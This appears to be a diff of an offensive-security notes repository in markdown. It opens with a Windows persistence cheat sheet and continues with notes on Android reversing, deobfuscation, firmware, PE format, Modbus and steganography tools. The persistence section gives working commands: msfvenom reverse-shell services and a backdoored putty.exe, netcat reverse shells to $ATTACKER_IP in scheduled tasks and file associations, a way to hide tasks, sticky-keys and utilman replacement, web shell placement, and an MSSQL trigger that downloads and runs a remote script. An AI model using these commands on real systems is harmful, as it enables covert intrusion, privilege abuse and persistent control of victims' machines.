* Insert LE hex of `0d500`, which is `f401`
## Add to registry
* Execute on user logon via
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```
## Add a Service
### Meterpreter
* Inside meterpreter `load powershell` and `powershell_shell`
```sh
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
```
### Powershell
* Start a service automatically
```sh
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
```
* Use a service PE instead
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
```
* Modify an existing service
* Enumerate all the services
```sh
sc.exe query state=all
```
* Info about a specific service, start type should be automatic, service start name should be target user
```sh
sc.exe qc <ServiceName>
```
* Reconfigure
```sh
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
```
## Add Scheduled Task
```sh
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```
* Alternatively via `schtasks`
```sh
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
```
* Check task
```sh
schtasks /query /tn SteamUpdater
```
* Deleting Security Descriptor of a task to make it invisible. Delete the following key
```sh
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
```
## File Backdoor
### Mimic PE
```sh
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
```
### Reference Script
* Recycle shortcut of an app to reference a reverse shell script
* Right click -> `Properties` -> `Target`
* Reference the the script `certainlynobackdoor.ps1` via
```sh
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
```
* Content of the script `certainlynobackdoor.ps1`
```sh
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe
```
### File Association
* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
* Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1`
* Chang the argument to a shell script and pass the arg through it
```sh
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```
* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`
## Persistence via Logon
### Startup directories
* Users' Startup directory under
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Startup directory for all users, put the reverse shell here
```sh
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```
### Registry Keys
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* Create `Expandable String Value` under any of this keys with the value of the reverse shell path
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
* Either `shell` or `Userinit` can be appended with a comma separated command
### Logon Scripts
* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts
* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload
## RDP or Login Screen
### Sticky Keys
* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
* Take ownership of the binary via
```sh
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
```
* Overwrite with `cmd.exe`
```sh
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```
### Utilman
* Ease of access button is clickable at the login screen, it is executed with system privileges
* Take ownership and overwrite with `cmd.exe`
```sh
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```
## Web Shell
* Default user is `iis apppool\defaultapppool`
* Has `SeImpersonatePrivilege`
* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
* Move shell to `C:\inetpub\wwwroot` on target
* Get the shell via `http://$TARGET_IP/shell.aspx`
## MSSQL
* Triggers bind actions such as INSERTs
* Open Microsoft SQL Server Management Studio
* Choose windows auth
* `New Query`
* Enable Advance Options via
```sh
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
```
* Grant privileges to all users
```sh
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
```
* Change to DB
```sh
USE <DATABASE>
```
* Create trigger
```sh
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees
FOR INSERT AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
```
* Trigger the trigger by visiting the site which triggers the trigger through a db call

3
Persistence/wmi.md Normal file
View File

@ -0,0 +1,3 @@
# WMI Backdoor
* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git)

81
Reverse Engineering/Android.md Normal file
View File

@ -0,0 +1,81 @@
# Misc
* `Dalvik` is the JVM of Android
## SMALI
* `SMALI` is the byte code derived from Java.
* Types
```
V void
Z boolean
B byte
S short
C char
F float
I int
J long
D double
[ array
```
### Registers
* Registers are 32 bits
* Type long and double use two registers 32+32=64 bits
* `.registers`, total number of regs in method
* `.locals`, non parameter regs in method
* Arguments of a method are put into registers from highest to lowest.
* The object itself is a parameter to its method.
* Register naming schemes are
* Normal local register are name v0, v1, v2 ...
* Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers.
## APK Structure
* `AndroidManifest.xml`, binary XML
* `classes.dex`, app code compilation as dex
* `resource.arsc`, precompiled resources in XML
* `res`, resource dir
* `assets` app assets
* `lib`, libraries
* `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk.
## Tools
* `jadx -d <outdir> <apk or dex>` as a decompiler
* dex2jar to convert apk to jar
```sh
d2j-dex2jar.sh /path/application.apk
```
* Dex to smali with `d2j-dex2smali`
* jd-gui as decompiler
* `apktool` smali source from apk
* [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git)
* [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git)
* [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git)
* Proguard deobfuscates code
* [PID Cat log reader](https://github.com/JakeWharton/pidcat.git)
* Burpsuite listener on Android emulator
* [Drozer](https://github.com/FSecureLABS/drozer)
```sh
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -> see all the packages installed
run app.package.info -a -> view package information.
run app.package.attacksurface package_name
run app.activity.info -f package_name
run app.activity.start --component package name component_name
```
```sh
run app.provider.info -a package_name
run scanner.provider.finduris -a package_name
run app.provider.query uri
run app.provider.update uri --selection conditions selection_arg column data
run scanner.provider.sqltables -a package_name
run scanner.provider.injection -a package_name
run scanner.provider.traversal -a package_name
```

97
Reverse Engineering/Deobfuscation.md Normal file
View File

@ -0,0 +1,97 @@
# Deobfuscation
## Principles of Obfuscation
* Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf)
* These layers and what's obfuscated are:
* __Code Element__
* Layout
* Controls
* Data
* Classes
* Methods
* __Software Component__
* __Inter Component__
* Library calls
* Used Resources
* __Application__
* DRM System
* Neural Networks
## Evade Statical Rules
* Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation
* __Array Transformation__
* __Data Encoding__
* __Data Procedurization__
* __Data Splitting & Merging__
### Splitting & Merging of Strings
* Breaking signature by modifying data distribution inside the code
* This may be done by modifying strings and functions through following measures
* __Joining__
```python
"CAFFEE" + "BABE"
```
* __Reordering__
```python
a = "BABE"
b = "CAFFEE"
f"{b}{a}"
```
* __Whitespaces of functions which are not interpreted__
```c
int main ( void ) {
printf ( "The answer is %d", 42 ) ;
}
```
* __Adding ticks which are not interpreted__
* __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__
### Adding Unnecessary Instructions
* Obfuscation of layout and controls inside the code
* __Junk Stubs__
* __Separation of Related Code__
* __Stripping Redundant Symbols__
* __Meaningless Identifiers__
* __Converting Explicit to Implicit Instructions__
* __Dispatcher Based Controls Executed During Runtime__
* __Probabilistic Control Flows__
* __Bogus Control Flows__
### Control Flow
* Changing or adding to the flow of the code through change of conditions
* Changes may be set to arbitrary code segments by __Opaque Predicates__
* An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the reverse engineer
### Protecting Data
* Stripping and protecting
* __Code Structure__
* __Object names__
* __File & Compilation Properties__
* To strip symbols
```sh
strip --strip-all <binary>
```
* Check via
```sh
nm <binary>
```
## Usage
* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
* In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__

9
Reverse Engineering/Dynamic Linked Libraries.md Normal file
View File

@ -0,0 +1,9 @@
# DLL Reversing
* Start DLL on its own with the help a wrapper
```C#
HMODULE dll = LoadLibraryA("DLL.DLL");
typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
Add(1, 2);
```

35
Reverse Engineering/Firmware.md Normal file
View File

@ -0,0 +1,35 @@
# Reversing Firmware
## Tools
* binwalk
* unlzma
* tar
* [fat](https://github.com/attify/firmware-analysis-toolkit.git)
* Create usable environment and start firmware inside it
```sh
./fat.py <firmware>
```
* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
## Usage
* Check image via `strings`
* Check CRC via `cksum -a crc <image>`
* Use `binwalk` to extract. There are to methods
* `-e` extract by offset
* `--dd=".*"` by file extension
### Mount JFFS2 File
* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
```sh
rm -rf /dev/mtdblock0
mknod /dev/mtdblock0 b 31 0
mkdir /mnt/jffs2
modprobe jffs2
modprobe mtdram
modprobe mtdblock
dd if=<jffs2File> of=/dev/mtdblock0
mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
```
## Tips & Tricks
* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)

4
Reverse Engineering/Function Mangling.md Normal file
View File

@ -0,0 +1,4 @@
# Function Decoration
* Done to imported functions in order to do interpositioning and identify the variants of the function.
* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)

17
Reverse Engineering/Krakatau.md Normal file
View File

@ -0,0 +1,17 @@
# Krakatau
## Usage
* Get bytecode from `jar` file
```sh
krakatau-disassemble -r file.jar -out dissassemble.zip
```
* Generate bytecode
```sh
krakatau-assemble -out result.jar -r dissassembled/
```
* Do changes to the bytecode
* Compile jar file
```sh
java -cp result.jar <fileNameOfMainClass>
```

33
Reverse Engineering/Portable Executable.md Normal file
View File

@ -0,0 +1,33 @@
# Portable Executable
* [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format)
* An executable binary in the windows world
The file format consists of
* PE Header
* Data Sections
## Data Section
The data section consists of
* __.text__, program code
* __.data__, initialized variables
* __.bss__, unanitialized variables
* __.edata__, exportable objects and related table info
* __.idata__, imported objects and related table info
* __.reloc__, image relocation info
* __.rsrc__, links external resources, e.g. icons, images, manifests
## Starting a PE
If a process starts, the PE is read in the following order
1. Header sections
* File signatue is __MZ__, and magic number are read
* Architecture of the platform
* timestamp
2. Section table details is parsed
3. Content is mapped into memory based on
* Entry point address and offset of ImageBase
* Relative Virtual Address (RVA), addresses related to Imagebase
4. Libraries and imports are loaded
5. Entrypoint address of the main function is run

7
Reverse Engineering/References.md Normal file
View File

@ -0,0 +1,7 @@
# Reverse Engineering References
## Debugger
[scdbg](https://github.com/dzzie/SCDBG.git)

35
Reverse Engineering/Scada.md Normal file
View File

@ -0,0 +1,35 @@
# Supervisory Control and Data Acquisition (SCADA)
* SCADA works as an aggregatio of the following systems
* __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
* __Remote Terminal Unit (RTU)__, use for wide area telemetry
* __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
* __Communication network__
* Security is no first class citizen
## Modbus
* Developed by Modicon
* Master/Slave, latter has an 8 bit address.
* RS-485 Connector
* Data registers 16 bit
* Input register, 16 bit ro
* Hold register, rw
* Coil register, 1 bit rw
* Discrete register, 1bit ro
### Function Codes
* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
* RTU request inside of TCP segments, port 502
* 1 __Read Coil__
* 2 __Read Discrete Input__
* 3 __Read Holding Registers__
* 4 __Read Input Registers__
* 5 __Write Single Coil__
* 6 __Write Single Holding Register__
* 15 __Write Multiple Coils__
* 16 __Write Multiple Holding Registers__

2
Steganography/OutGuess.md Normal file
View File

@ -0,0 +1,2 @@
# Outguess
`man outguess`

10
Steganography/References.md Normal file
View File

@ -0,0 +1,10 @@
# Steganography Tools
[Stego-Toolkit](https://github.com/DominicBreuker/stego-toolkit.git)
[OutGuess](https://github.com/resurrecting-open-source-projects/outguess)
[Remnux Docs](https://docs.remnux.org/)
[Steghide](http://steghide.sourceforge.net/)
[Stegbrute](https://github.com/R4yGM/stegbrute)
[stegoVeritas](https://github.com/bannsec/stegoVeritas)
[zsteg](https://github.com/zed-0xff/zsteg)

24
Steganography/Remnux.md Normal file
View File

@ -0,0 +1,24 @@
# ReMnux
* [Documentation](https://docs.remnux.org/)
## Tools
### Peepdf
* Extracting JS from PDF using config file into `js_from_pdf.js`
```sh
echo 'extract js > js_from_pdf.js' > extract_js.conf
peepdf -s extract_js.conf <file.pdf>
```
### vmonkey
* Detects malicious VBasic code in documents.
```sh
vmonkey <file.doc>
```
### Packaged Binaries
* Can be identified via entropy or loaded libs
* The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`.
* [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers.
* File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high.

9
Steganography/Stegbrute.md Normal file
View File

@ -0,0 +1,9 @@
# Stegbrute
Bruteforce stego jpegs with a password.
* install via `cargo install stegbrute`
## Usage
```sh
stegbrute -f <filename> -w <wordlist>
```

8
Steganography/Steghide.md Normal file
View File

@ -0,0 +1,8 @@
# Steghide
* JPGs only
* Example
```sh
steghide extract -sf jpeg1.jpeg
```

15
Steganography/StegoScripts/xor_key_file.py Normal file
View File

@ -0,0 +1,15 @@
#!/usr/bin/env python
def xor(data, key):
keylen = len(key)
return bytearray((
(data[i] ^ key[i % keylen]) for i in range(0,len(data))
))
if __name__ == "__main__":
data = bytearray(open('topsecret.txt', 'rb').read())
key = b'key'
res = xor(data, key)
print(res.decode())

3
Steganography/Stegoveritas.md Normal file
View File

@ -0,0 +1,3 @@
# Stegoveritas
* Install via `pip install stegoveritas` and `stegoveritas_install_deps`

8
Steganography/Zsteg.md Normal file
View File

@ -0,0 +1,8 @@
# zsteg
* PNGs, BMPs
* Example
```sh
zsteg png1.png --strings all
```